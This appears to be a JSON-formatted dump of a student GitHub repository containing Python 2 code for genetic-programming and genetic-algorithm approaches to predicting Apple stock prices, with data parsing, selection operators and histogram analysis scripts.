probability\n\nminimum_size = 3 #Minimum size of the tree that will be \n\t\t #preserved during crossover\niteration = 10\n" }, { "alpha_fraction": 0.6075268983840942, "alphanum_fraction": 0.6075268983840942, "avg_line_length": 14.166666984558105, "blob_id": "1fc665d4133ae3ff98caa057df8ca076ef62c503", "content_id": "a99a364064673244c04966f3f14583af9b75d409", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 186, "license_type": "no_license", "max_line_length": 36, "num_lines": 12, "path": "/Rahul_Genetic_Program/data/reverse_data.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "\n_in = open('./APPLE_STOCK.csv', 'r')\nout = open('./apple_stock.txt','w')\n\nlines = []\n\nfor line in _in:\n\tlines.append(line)\n\nlines.reverse()\n\nfor line in lines:\n\tout.write(str(line))\n\n\t\n" }, { "alpha_fraction": 0.608851969242096, "alphanum_fraction": 0.6164906620979309, "avg_line_length": 31.669116973876953, "blob_id": "a32ce224ecb7820a1bc9945e1f37b6e964286f8c", "content_id": "8122f42bff470e83fa2d75bd680702b1ac8df776", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4451, "license_type": "no_license", "max_line_length": 114, "num_lines": 136, "path": "/Rahul_Genetic_Program/apple/inspect.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": 
"UTF-8", "text": "#Rahul Ramakrishnan\n#module: inspect\n\n'''\n Tree Inspection \n\t &\n\tTesting Operators\n'''\n\nimport recombination\nimport fitness\nimport initialize\nimport config\n\nfrom termcolor import colored\nmean_best = open('/Users/rahulramakrishnan/Desktop/trial_2_' + str(config.iteration) + '_real_mean_best.txt', 'w')\n#Prints Trees Level by Level\ndef printTreePopulation(population):\n\tmap(lambda tree: printTree(tree), population)\n\n#Prints Trees by their Equation (in-order)\ndef printEquationPopulation(population, generation):\n\tsize = len(population)\n\tequation_dict = {}\n\t#print (colored(\"Size of population: %d\", 'blue') %(len(population)))\n\t\n for tree in population:\n\t\tpath = []\n recombination.loadPaths(tree.root, path)\n equation = fitness.createEquation(path)\n error = fitness.fitnessValue(tree)\n\t\tif equation not in set(equation_dict.keys()):\n\t\t\tequation_dict[equation] = {}\n\t\t\tequation_dict[equation][error] = 1\n\t\telse:\n\t\t\tequation_dict[equation][error] += 1\n\t\t\n\t#Output Generation Number\n\tfirst_part = colored(\"\\nGENERATION: %d \", 'magenta') %(generation)\n\tboundary = \"=\" * 100\n\tsecond_part = colored(boundary, 'magenta')\n\tprint first_part + second_part\n\t\n\t#Sort based on value of dictionary\n\tsorted_equation = sorted(equation_dict.iteritems(), key=lambda x: x[1])\n\tfor i, equation_and_error in enumerate(sorted_equation):\n\t\tfor j in range(0, equation_and_error[1].values()[0]):\n\t\t\tequation = (colored(\"%s\", 'green') %(equation_and_error[0]))\n\t\t\terror = (colored(\"Fitness: %s\", 'blue') %(equation_and_error[1].keys()[0]))\n\t\t\tprint equation + \" === \" + error\n\t\t\t\n\tpopulation_fitness = map(lambda x: x.fitness, population)\n\tmean_fitness = sum(population_fitness)/float(size)\n\tbest_fitness = min(population_fitness)\t\n\toutput_mean_fitness = colored(\"Mean Fitness: %f\", 'yellow') %(mean_fitness)\t\n\toutput_best_fitness = colored(\"Best Fitness: %f\", 'red') %(best_fitness)\n\tmean_best.write(str(mean_fitness) + \" \" + str(best_fitness) + \"\\n\") #Write to file\n\tprint output_mean_fitness + \"\\n\" + output_best_fitness\n\t\n#Depth of a tree\ndef depth(root):\n if(root == None):\n return 0\n else:\n return 1 + max(depth(root.left), depth(root.right))\n\n#Prints each level\ndef printTree(tree):\t\n root = tree.root\n print \"-----Tree Level by Level--- Depth of Tree: %d\" %(depth(root))\n result = createLeveledTree(root)\n for level_index, level in enumerate(result):\n nodes = []\n for node in level:\n nodes.append(node.value)\n print str(level_index) + \": \" + str(nodes)\n print \"Tree's Fitness: %f \" %(tree.fitness)\n\n#Prints the equation\ndef printEquation(tree):\n\tpath = []\n\trecombination.loadPaths(tree.root, path)\n\tequation = fitness.createEquation(path)\n\tprint equation\n\n#Creates a list of levels of a tree\ndef createLeveledTree(root):\n result = [] \n current = []\n if(root != None):\n current.append(root)\n while (len(current) > 0):\n result.append(current)\n parents = current\n current = []\n for parent in parents:\n if (parent.left != None):\n current.append(parent.left)\n if (parent.right != None):\n current.append(parent.right)\n return result\n\n#Traverses the tree in-order\n#for viewing purposes\ndef inOrderTraversal(root):\n if root == None:\n return\n inOrderTraversal(root.left)\n print root.value\n inOrderTraversal(root.right)\n\n\n#Testing Mutation\ndef testMutation():\n depth = 4\n apple_tree_1 = initialize.initGeneticTree(depth)\n print \"Before Mutation\"\n 
printTree(apple_tree_1.root)\n mutate(apple_tree_1.root)\n print \"After Mutation\"\n printTree(apple_tree_1.root)\n\n#Testing Crossover\ndef testCrossover():\n depth = 5\n apple_tree_1 = initialize.initGeneticTree(depth)\n apple_tree_2 = initialize.initGeneticTree(depth)\n print \"Before Crossover: \\nTree 1\"\n printTree(apple_tree_1.root)\n print \"Tree 2\"\n printTree(apple_tree_2.root)\n recombination.crossover(apple_tree_1.root, apple_tree_2.root)\n print \"\\nAfter Crossover: \\n Tree 1\"\n\tprintTree(qpple_tree_1) \n\tprint \"Tree 2\"\n\tprintTree(apple_tree_2)\n \n" }, { "alpha_fraction": 0.5077672600746155, "alphanum_fraction": 0.5251294374465942, "avg_line_length": 32.479591369628906, "blob_id": "306a6513be6f4579c03d2673d290bb5bc3d18c46", "content_id": "68e4598809a14c037108ad2b414a5518fc86ad35", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3283, "license_type": "no_license", "max_line_length": 117, "num_lines": 98, "path": "/Genetic_algorithm_Tushar/ga/individual.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "\n# import range related functions\n# import representation related functions\n\nimport operator\nimport random\n\nfrom random import randint as ri\nfrom random import uniform as ru\n\nrandom.seed(1234)\n\nclass Individual:\n def __init__(self, number_of_signals, bit_length = 16):\n self.rep = \"\"\n self.sig_size = bit_length\n #self.signal_range = signal_ranges(datasets)\n for i in xrange(number_of_signals):\n random_val = bin(ri(0, 2 ** bit_length))[2:]\n random_val = random_val.zfill(bit_length)\n self.rep = self.rep + random_val \n\n def change_individual(self, bit_string):\n if bit_string != None and type(bit_string) is str:\n self.rep = bit_string\n else:\n print \"incorrect input\"\n\n\n def transform_individual(self, signal_ranges):\n \"\"\" Takes a list of 2 tuples defining the signal ranges and scales the binary string to the appropriate value\n \"\"\"\n num_signals = len(signal_ranges)\n repr_size = len(self.rep)\n n = repr_size / num_signals\n\n individual_signals = [ self.rep[i:i+n] for i in xrange(0, len(self.rep), n) ] \n individual_vals = []\n\n for i in range(num_signals):\n min_val = signal_ranges[i][0]\n max_val = signal_ranges[i][1]\n range_val = abs(max_val - min_val) \n signal_value = min_val + (range_val * (float(int(individual_signals[i], 2)) / 2 ** n))\n individual_vals.append(signal_value)\n\n return individual_vals\n\n\n \n def mutate(self, mutate_probability):\n l = list(self.rep)\n\n for i in xrange(self.sig_size):\n r = ru(0,1)\n if r < mutate_probability:\n for j in xrange(i,self.sig_size, self.sig_size):\n if l[j] == '1':\n l[j] = '0'\n elif l[j] == '0':\n l[j] = '1'\n\n self.rep = \"\".join(l)\n\n\n def crossover_2way(self, other_parent, crossover_probability):\n l1 = len(self.rep)\n l2 = len(other_parent.rep)\n expected_length = 0\n #print \"before crossover\"\n #print self.rep\n #print other_parent.rep\n if l1 == l2:\n expected_length = l1\n tmp_p1 = \"\"\n tmp_p2 = \"\"\n for i in xrange(0, l1 , self.sig_size):\n p1 = self.rep[i: (i+self.sig_size) ]\n p2 = other_parent.rep[i: (i+self.sig_size) ]\n point = ri(0, self.sig_size - 1) \n #print point\n tmp1 = p1[point:]\n tmp2 = p2[point:]\n p1 = p1[:point] + tmp2\n p2 = p2[:point] + tmp1\n tmp_p1 = tmp_p1 + p1\n tmp_p2 = tmp_p2 + p2\n #print \"After crossover\"\n #print tmp_p1\n #print tmp_p2\n # used parent replaces children survivor selection\n if expected_length != 0:\n 
self.change_individual(tmp_p1.zfill(expected_length))\n other_parent.change_individual(tmp_p2.zfill(expected_length))\n #print \"After crossover\"\n #print self.rep \n #print other_parent.rep \n else:\n print \"length of both parents must be equal\"\n\n" }, { "alpha_fraction": 0.7145061492919922, "alphanum_fraction": 0.7227365970611572, "avg_line_length": 27.159420013427734, "blob_id": "e1e0cbfbe61f447fed676dece925541c4fda8353", "content_id": "1c882cf2b6c1d7ac29cbc2b473d76ff555490cf9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1944, "license_type": "no_license", "max_line_length": 77, "num_lines": 69, "path": "/Rahul_Genetic_Program/apple/selection.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: selection\n\n'''\n\tParent Selection\n\tFunctions\n'''\nfrom config import tournament_size\nfrom copy import deepcopy\nfrom random import sample\nfrom random import random\n\n'''\n\tRoullette Wheel\n'''\ndef sortPopulation(population):\n\t#Sort in descending order by fitness(error): highest error --> lowest error\n\tsorted_pop = sorted(population, key=lambda tree: tree.fitness, reverse=True)\n\treturn sorted_pop\n\ndef createRoulletteWheel(population):\n\t#Sum Ranks\n\ttotal = len(population)\t\n\t_rank_sum = reduce(lambda x,y: x+y, xrange(1, total+1))\t\n\t#Assign probability\n\tprobabilities = map(lambda i: i/float(_rank_sum), xrange(1, total+1))\t\n\t#Generate intervals\n\troulletteWheel = map(lambda i: 0, xrange(0, total)) #Fill list with zeroes\n\tfor i,p in enumerate(probabilities):\n\t\tif (i == 0):\n\t\t\troulletteWheel[0] = probabilities[i] \n\t\telse:\n\t\t\troulletteWheel[i] = roulletteWheel[i-1] + probabilities[i]\t\t\n\treturn roulletteWheel\t\n\ndef roulletteParentSelection(roulletteWheel, population):\t\n\tpopulation_size = len(population)\t\n\tsorted_population = sortPopulation(population)\n\tpopulation[:] = []\t\n\tfor i in xrange(0, population_size):\t\n\t\t#0.0 <= X <= 1.0\n\t\tnumber = random()\n\t\tfor j in xrange(0, len(roulletteWheel)):\n\t\t\tif (number <= roulletteWheel[j]):\n\t\t\t\tnew_tree = deepcopy(sorted_population[j])\n\t\t\t\tpopulation.append(new_tree)\t\n\t\t\t\tbreak \t#break out of inner for loop\n\t\n\n'''\n\tTournament Selection\n'''\ndef tournamentParentSelection(population):\n\ttemp_population = deepcopy(population)\t\t\n\tpopulation_size = len(population)\n\tk = tournament_size \n\tpopulation[:] = []\n\tfor p in xrange(0, population_size):\n\t\ttournament = sample(temp_population, k)\t\t\n\t\ttree = bestMatch(tournament)\n\t\tnew_tree = deepcopy(tree)\n\t\tpopulation.append(new_tree)\t\t\n\t\ndef bestMatch(tournament):\n\tfitnesses = map(lambda x: x.fitness, tournament)\n\tbest_fitness = min(fitnesses)\n\tbest_index = fitnesses.index(best_fitness)\n\tbest_tree = tournament[best_index]\n\treturn best_tree\n\n" }, { "alpha_fraction": 0.5741029381752014, "alphanum_fraction": 0.6141445636749268, "avg_line_length": 32.71929931640625, "blob_id": "a72f7ec9d4fd86528e2c93e9d6a8de6995dfb67a", "content_id": "51bd7351f3aaf7ab6299c4f811c8e2ff73bf5b15", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3846, "license_type": "no_license", "max_line_length": 119, "num_lines": 114, "path": "/Rahul_Genetic_Program/apple/scrape.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Rahul Ramakrishnan\n#module: scrape\n'''\n\t1. Scrapes stock data\n\t2. 
Structures data\n\t3. Returns data\n'''\n\nimport datetime\nimport random\n\n#Could use a generator, yield\ndef getTerminal():\n\t\n\tterminals = ['apple_open', 'apple_high', 'apple_low', \n\t\t 'apple_close', 'apple_volume', 'nasdaq_open', \n\t\t 'nasdaq_high', 'nasdaq_low', 'nasdaq_close', \n 'nasdaq_volume', 'sp500_open', 'sp500_high', \n\t\t 'sp500_low', 'sp500_close', 'sp500_volume']\n\n\t#Add 10 random coefficients into terminal list\n\t#to be used when applying operators on signals\n\tfor i in range(0,15):\n\t\trandom_integer = random.randint(-500, 500)\n\t\tnumber = random_integer * random.random()\n\t\t#Protect against divide by zero\n\t\tif(number == 0):\n\t\t\tnumber = .0001\n\t\tterminals.append(number)\t\n\n\trandom.shuffle(terminals)\t\n\treturn terminals\n\ndef getFunctional():\n\tfunctionals = ['+' , '/', '*', '-']\t\n\t#Will add math.exp, math.log, math.ln, math.e\t\n\trandom.shuffle(functionals)\n\treturn functionals\n\ndef getNasdaqData():\n\t#Open file reading stream\n\tnasdaq = open('/Users/rahulramakrishnan/Projects/algorithmic-trading/Rahul_Genetic_Program/data/nasdaq.txt', 'r')\t\n\t#Training dates\n\tbegin_date = datetime.date(2011, 01, 01)\t\n\tend_date = datetime.date(2013, 12, 31)\n\t#Set up data structor to store the data\n\tnasdaq_data = []\n\t#Parse file\n\tfor line in nasdaq:\n\t\tinfo = line.split(',')\t\t\n\t\tdate = info[0]\t\n\t\tyear = int(date[:4]) \n\t\tmonth = int(date[5:7]) \n\t\tday = int(date[8:10])\n\t current = datetime.date(year, month, day)\t\n\t\t#Financial Placeholder for current data\n\t\tfinance_dict = {}\n\t\t#Check data date\n\t\tif current >= begin_date and current <= end_date:\n\t\t\t#Store financial data\n\t\t\tfinance_dict[\"nasdaq_open\"] = float(info[1])\n\t\t\tfinance_dict[\"nasdaq_low\"] = float(info[2])\n\t\t\tfinance_dict[\"nasdaq_high\"] = float(info[3])\n\t\t\tfinance_dict[\"nasdaq_close\"] = float(info[4])\n\t\t\tfinance_dict[\"nasdaq_volume\"] = float(info[5])\n\t\t\t#Storing financial data in the list\n\t\t\tnasdaq_data.append(finance_dict)\t\n\treturn nasdaq_data\t\n\n\ndef getAppleData():\t\n\tapple = open('/Users/rahulramakrishnan/Projects/algorithmic-trading/Rahul_Genetic_Program/data/apple_stock.txt', 'r')\n\tbegin_date = datetime.date(2011, 01, 01)\n\tend_date = datetime.date(2013, 12, 31)\n\tapple_data = []\n\tfor line in apple:\n\t\tinfo = line.split(',')\n\t\tdate = info[0]\n\t\tyear = int(date[:4]) \n\t\tmonth = int(date[5:7]) \n\t\tday = int(date[8:10])\n\t\tcurrent = datetime.date(year, month, day)\t\n\t\tfinance_dict = {}\n\t\tif current >= begin_date and current <= end_date:\n\t\t\tfinance_dict[\"apple_open\"] = float(info[1])\n\t\t\tfinance_dict[\"apple_low\"] = float(info[2])\n\t\t\tfinance_dict[\"apple_high\"] = float(info[3])\n\t\t\tfinance_dict[\"apple_close\"] = float(info[4])\n\t\t\tfinance_dict[\"apple_volume\"] = float(info[5])\n\t\t\tapple_data.append(finance_dict)\n\treturn apple_data\t\t\n\n\ndef getSP500Data():\n sp500= open('/Users/rahulramakrishnan/Projects/algorithmic-trading/Rahul_Genetic_Program/data/sp_500.txt', 'r')\n begin_date = datetime.date(2011, 01, 01) \n end_date = datetime.date(2013, 12, 31) \n sp500_data = []\n for line in sp500:\n info = line.split(',')\n date = info[0]\n year = int(date[:4]) \n month = int(date[5:7]) \n day = int(date[8:10])\n current = datetime.date(year, month, day) \n finance_dict = {}\n if current >= begin_date and current <= end_date:\n finance_dict[\"sp500_open\"] = float(info[1])\n finance_dict[\"sp500_low\"] = float(info[2])\n 
finance_dict[\"sp500_high\"] = float(info[3])\n finance_dict[\"sp500_close\"] = float(info[4])\n finance_dict[\"sp500_volume\"] = float(info[5])\n sp500_data.append(finance_dict)\n return sp500_data\n\n\n" }, { "alpha_fraction": 0.7128547430038452, "alphanum_fraction": 0.7128547430038452, "avg_line_length": 27.33333396911621, "blob_id": "f1ab6c5079644867b1874e78f94918bbdae8f5c7", "content_id": "49c1b0d80eeed1c03a5c87624d8b612c47ba84f6", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 599, "license_type": "no_license", "max_line_length": 53, "num_lines": 21, "path": "/README.md", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "Evolutionary Computing\n======================\n\n\n**Description:**\nWe have two strategies in predicting\napple stock prices, one is through a \ngenetic program, the other is through a\ngenetic algorithm. Follow the instructions\nin the respective README's in sub repositories.\n\n\n- Genetic Program: Rahul Ramakrishnan\n\t- Evolves a tree based population to minimize\n\t the error between predicted price and actual price\n\t- Uses signals from nasdaq, apple, s&p, and soon to \n be more. \n\n- Genetic Algorithm: Tushar Dadlani\n\t- Evolves a bit string population to guess if the \n\t next day's stock will go up or down. \n\n\n\n" }, { "alpha_fraction": 0.44447752833366394, "alphanum_fraction": 0.5841023921966553, "avg_line_length": 35.4782600402832, "blob_id": "8b9d917900348586ef61f6d9db55e587a1682729", "content_id": "5fb1da6b4a080fd32fbc9034f1add57fab0cb863", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3359, "license_type": "no_license", "max_line_length": 145, "num_lines": 92, "path": "/Rahul_Genetic_Program/analysis/histogram.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "#Generates a Histogram\n#Rahul Ramakrishnan\n\n\nimport json\nimport os\n\n\n#first_dir = '/Users/rahulramakrishnan/Desktop/Trial_1_Dataset'\n#second_dir = '/Users/rahulramakrishnan/Desktop/Trial_2_Dataset'\n#third_dir = '/Users/rahulramakrishnan/Desktop/Trial_3_Dataset'\n#first_dir = '/Users/rahulramakrishnan/OneDrive/Academia/Stochastic Optimization/Algorithmic_Trading_Data/Tournament Selection Data/T_S_Trial_1'\n#second_dir = '/Users/rahulramakrishnan/OneDrive/Academia/Stochastic Optimization/Algorithmic_Trading_Data/Tournament Selection Data/T_S_Trial_2'\n#third_dir = '/Users/rahulramakrishnan/OneDrive/Academia/Stochastic Optimization/Algorithmic_Trading_Data/Tournament Selection Data/T_S_Trial_3'\n\nmean_histogram = { 0 : 0, \n\t \t 100 : 0,\n\t 1000 : 0, \n \t 10000 : 0,\n\t \t 100000 : 0, \n \t 1000000 : 0,\n\t \t 10000000 : 0, \n\t \t 100000000 : 0, \n\t 1000000000 : 0 }\n\nbest_histogram = { 0 : 0, \n \t 100 : 0,\n \t 1000 : 0, \n \t 10000 : 0,\n \t 100000 : 0, \n \t 1000000 : 0,\n \t 10000000 : 0, \n \t 100000000 : 0, \n \t 1000000000 : 0 } \n\nfiles = []\nfor root, dirs, filenames in os.walk(third_dir):\n\tfor f in filenames:\n\t\tfiles.append(open(os.path.join(root, f), 'r'))\n\nmean_histogram_file = open('./mean_histo_3.txt', 'w')\nbest_histogram_file = open('./best_histo_3.txt', 'w')\n\nfor i in range(1, len(files)):\n\tfor line in files[i]:\t\n\t\twords = line.split(' ')\n\t\tmean = words[0]\n\t\tbest = words[1]\t\n\t\n\t\tmean_num = float(mean)\n\t\tbest_num = float(best)\n\t\n\t \tif mean_num >= 0 and mean_num < 100:\t\t\n\t\t\tmean_histogram[0] += 1\n\t\telif mean_num >= 100 and mean_num < 
1000:\t\n\t\t\tmean_histogram[100] += 1\n\t\telif mean_num >= 1000 and mean_num < 10000:\n\t\t\tmean_histogram[1000] += 1\n\t\telif mean_num >= 10000 and mean_num < 100000:\n\t\t\tmean_histogram[10000] += 1\n\t\telif mean_num >= 100000 and mean_num < 1000000:\n\t\t\tmean_histogram[100000] += 1\n\t\telif mean_num >= 1000000 and mean_num < 10000000:\n\t\t\tmean_histogram[1000000] += 1\n\t\telif mean_num >= 10000000 and mean_num < 100000000:\n\t\t\tmean_histogram[10000000] += 1\n\t\telif mean_num >= 100000000 and mean_num < 1000000000:\n\t\t\tmean_histogram[100000000] += 1\t\n\t\telif mean_num >= 1000000000:\n\t\t\tmean_histogram[1000000000] += 1\n\n\t\tif best_num >= 0 and best_num < 100:\n \tbest_histogram[0] += 1\n elif best_num >= 100 and best_num < 1000:\n \tbest_histogram[100] += 1\n elif best_num >= 1000 and best_num < 10000:\n \tbest_histogram[1000] += 1\n elif best_num >= 10000 and best_num < 100000:\n \tbest_histogram[10000] += 1\n elif best_num >= 100000 and best_num < 1000000:\n \tbest_histogram[100000] += 1\n elif best_num >= 1000000 and best_num < 10000000:\n \tbest_histogram[1000000] += 1\n elif best_num >= 10000000 and best_num < 100000000:\n \tbest_histogram[10000000] += 1\n elif best_num >= 100000000 and best_num < 1000000000:\n \tbest_histogram[100000000] += 1 \n elif best_num >= 1000000000:\n \tbest_histogram[1000000000] += 1\n\njson.dump(mean_histogram, mean_histogram_file)\njson.dump(best_histogram, best_histogram_file)\n\n\t\n" }, { "alpha_fraction": 0.7863247990608215, "alphanum_fraction": 0.7948718070983887, "avg_line_length": 28.25, "blob_id": "40e94f2a80eb723ab4f677b0829e6c6be0fd462e", "content_id": "7d36f975edc519fe18e9844c80706db9d3abb981", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 117, "license_type": "no_license", "max_line_length": 78, "num_lines": 4, "path": "/Genetic_algorithm_Tushar/README.txt", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "Ideas: \n\n1. 
Binary String representation to start with as we would be just predicting a\npositive or negative change.\n" }, { "alpha_fraction": 0.5463888049125671, "alphanum_fraction": 0.5563802719116211, "avg_line_length": 32.342857360839844, "blob_id": "733e449e6528cac4113b7bb1c6e0f6d8d5685af2", "content_id": "f37d5853b5c33e0028b17cfbf5f461420ff6cf56", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3503, "license_type": "no_license", "max_line_length": 91, "num_lines": 105, "path": "/Genetic_algorithm_Tushar/ga/population.py", "repo_name": "seepls/algorithmic-trading", "src_encoding": "UTF-8", "text": "import random\nimport math\nimport operator\n\nfrom individual import Individual\n\nrandom.seed(1234)\n\ndef percent_diff(approx , correct):\n #print \"approx, correct\"\n #print approx, correct\n return ((approx - correct) / float(correct))\n\n\nclass Population(object):\n def __init__(self, size, signal_ranges, data, pm = 1/16.0 , pc = 0.7):\n individual_size = len(signal_ranges)\n self.population = []\n self.signal_ranges = signal_ranges\n self.pm = pm\n self.pc = pc\n self.size = size\n self.num_signals = len(signal_ranges)\n self.data = data\n #print \"self.data\"\n #print self.data\n self.data_size = len(data)\n for i in xrange(size):\n self.population.append(Individual(individual_size))\n\n\n def __getitem__(self, key):\n return self.population[key]\n\n def fitness_function(self, individual):\n transformed_individual = individual.transform_individual(self.signal_ranges)\n #print \"Transformed individual\"\n #print transformed_individual\n positive = 0\n count = 0\n for element in self.data:\n #one_iter = []\n #print \"element\"\n #print element\n for item in xrange(self.num_signals):\n #for item in xrange(3):\n \n #threshold = int(0.6 * self.num_signals)\n #print \"GA, value\"\n #print transformed_individual[item]\n #print \"actual value\"\n #print element[item]\n #print \"Delta\"\n #print transformed_individual[item] - element[item]\n #one_iter.append(percent_diff(transformed_individual[item], element[item]))\n #print transformed_individual[item]\n #print \"element[item]\"\n #print element[item]\n #print \"abs percent diff\"\n #print percent_diff(transformed_individual[item], element[item])\n if abs(percent_diff(transformed_individual[item], element[item])) < 0.5 :\n count = count + 1\n #print positive\n #return float(positive) / self.data_size\n #return float(positive) \n #print one_iter\n #print \"count\"\n #print count\n total_items = self.num_signals * self.data_size\n val = float(count) / total_items\n return val\n\n\n def sus_sampler(self, fitness_list):\n size = len(fitness_list)\n total_fitness = reduce(operator.add, fitness_list)\n\n if total_fitness == 0.0:\n print \"total_fitness == 0\"\n sel_prob_list = fitness_list\n else:\n sel_prob_list = [x/ total_fitness for x in fitness_list]\n summed_prob_list = []\n for i in xrange(1, len(sel_prob_list) + 1):\n summed_prob_list.append(reduce(operator.add, sel_prob_list[:i]))\n #print summed_prob_list\n \n\n i = 0\n r = random.uniform(0, 1.0/size)\n mating_pool = []\n while len(mating_pool) <= size -1:\n while r < summed_prob_list[i]:\n mating_pool.append(self.population[i])\n r = r + 1.0/size\n i += 1\n self.population = mating_pool\n\n def mutation(self):\n for individual in self.population:\n individual.mutate(self.pm)\n\n def crossover(self):\n for i in xrange(0, self.size, 2):\n self.population[i].crossover_2way(self.population[i+1], self.pc)\n\n\n" } ]
21
Caleb-Grode/bluewhale
https://github.com/Caleb-Grode/bluewhale
6b2486ca26d68f585c4ed600fedf5954a6282dc7
a7c121ec6b6ae8039c434598e5dcc02ce4688792
6d378d288be1fe28c1e914cc692bc9477e04bac6
refs/heads/main
2023-06-29T03:58:40.194698
2021-08-06T22:00:43
2021-08-06T22:00:43
383,904,684
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5951219797134399, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 34.775001525878906, "blob_id": "1d349c3e577823c25c63093e6ece4d6b21acdcbc", "content_id": "6e649c48fcda32052adf08fe84387fce4bc18498", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1435, "license_type": "no_license", "max_line_length": 117, "num_lines": 40, "path": "/bluewhale_vm_provider_category_list.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: return the virtual machines from a given provider in a given compute category\n\nimport json\nimport boto3\nfrom boto3.dynamodb.conditions import Attr\n\ndef lambda_handler(event, context):\n # parameters\n provider = event['queryStringParameters']['provider']\n category = event['queryStringParameters']['category']\n dynamodb = boto3.resource('dynamodb', endpoint_url=\"https://dynamodb.us-east-1.amazonaws.com\")\n\n table = dynamodb.Table('bluewhale_resources')\n \n print(\"Getting data...\")\n # get azure and gcp vm data\n third_party_vm = table.scan(\n FilterExpression= Attr('resource type').eq('virtual machine') \n & Attr('provider').eq(provider)\n & Attr('virtual machine type').eq(category)\n )\n \n # json does not support the decimal type that DynamoDB stores our numbers as so we need to re-cast the data types\n for item in third_party_vm['Items']:\n print(item)\n if 'MemoryMB' in item:\n item['MemoryMB'] = int(item['MemoryMB'])\n if 'vCPUs' in item:\n item['vCPUs'] = int(item['vCPUs'])\n if 'vCPUsPerCore' in item:\n item['vCPUsPerCore'] = int(item['vCPUsPerCore'])\n \n return {\n 'statusCode': 200,\n 'headers' : {\n 'Access-Control-Allow-Origin': '*',\n },\n 'body': json.dumps(third_party_vm)\n }\n " }, { "alpha_fraction": 0.7331887483596802, "alphanum_fraction": 0.7418655157089233, "avg_line_length": 34.42307662963867, "blob_id": "dafbf3989b0d5a1406f74166c95b20a395716571", "content_id": "b4aa0ca25129b249a226902b57dd01f3ae62e7d1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 922, "license_type": "no_license", "max_line_length": 109, "num_lines": 26, "path": "/testing+data/azureAPI.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "import requests\nimport adal\nimport json\nimport os\n\n# call azure API!\n\n# info for azure authentification\nazure_client_id = os.environ['azure_client_id']\nazure_secret = os.environ['azure_secret']\nazure_subscription_id = os.environ['azure_subscription_id']\nazure_tenant = os.environ['azure_tenant']\nauthority_url = 'https://login.microsoftonline.com/' + azure_tenant\nresource = 'https://management.azure.com/'\n\ncontext = adal.AuthenticationContext(authority_url)\ntoken = context.acquire_token_with_client_credentials(resource, azure_client_id, azure_secret)\n\nheaders = {'Authorization': 'Bearer ' + token['accessToken'], 'Content-Type': 'application/json'}\n\nparams = {'api-version': '019-04-01'}\nurl = 'https://management.azure.com/subscriptions/'+azure_subscription_id+'/providers/Microsoft.Compute/skus'\n\nr = requests.get(url, headers=headers, params=params)\n\nprint(json.dumps(r.json(), indent=4, separators=(',', ': ')))\n\n" }, { "alpha_fraction": 0.5926773548126221, "alphanum_fraction": 0.5997711420059204, "avg_line_length": 39.841121673583984, "blob_id": "d424f497a096c58c3942048e27eeafc87150276d", "content_id": "2bdbbb28eb5c86684fb38c062fd8c59357cd85f5", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 4370, "license_type": "no_license", "max_line_length": 136, "num_lines": 107, "path": "/bluewhale_aws_refresh.py", "repo_name": "Caleb-Grode/bluewhale", "src_encoding": "UTF-8", "text": "# Author: Caleb Grode\n# Purpose: This function calls an EC2 API to retrieve specs about the different AWS EC2 offerings. \n# It categorizes and selects the desired specs for every returned instance and puts them into the DynamoDB\n# Table 'bluewhale_resources'\n\n\nimport boto3\nimport json\n\ndef ebs_refresh():\n # this is one of the few hard coded values, if a new category is updated, this will need to change\n ebs_categories = ['Magnetic', 'General Purpose', 'Provisioned IOPS', 'Throughput Optimized HDD', 'Cold HDD']\n\n pricing_client = boto3.client('pricing', region_name='us-east-1')\n\n # get all ebs products\n # this block is an API call that parses the json data\n ebs_details = []\n ebs_names = []\n for ebs_type in ebs_categories:\n response = [\"NextToken\"]\n while \"NextToken\" in response:\n response = pricing_client.get_products(ServiceCode='AmazonEC2', Filters=[\n {'Type': 'TERM_MATCH', 'Field': 'volumeType', 'Value': ebs_type}])\n\n for priceItem in response[\"PriceList\"]:\n priceItemJson = json.loads(priceItem)\n name = priceItemJson['product'][\"attributes\"]['volumeApiName']\n if name not in ebs_names:\n ebs_names.append(name)\n ebs_details.append(priceItemJson)\n \n # we now have data about the volumes but need to parse out and only grab that data we want for the DB\n refresh_data = []\n # get the name and attributes for each!\n for details in ebs_details:\n attrs = details['product']['attributes']\n ebs_data = {}\n ebs_data['name'] = attrs['volumeApiName']\n ebs_data['provider'] = 'AWS'\n ebs_data['resource type'] = 'virtual disk'\n ebs_data['maxIopsvolume'] = attrs['maxIopsvolume']\n ebs_data['maxThroughputvolume'] = attrs['maxThroughputvolume']\n ebs_data['maxVolumeSize'] = attrs['maxVolumeSize']\n ebs_data['storageMedia'] = attrs['storageMedia']\n ebs_data['volumeType'] = attrs['volumeType']\n ebs_data['MaxSizeGiB'] = 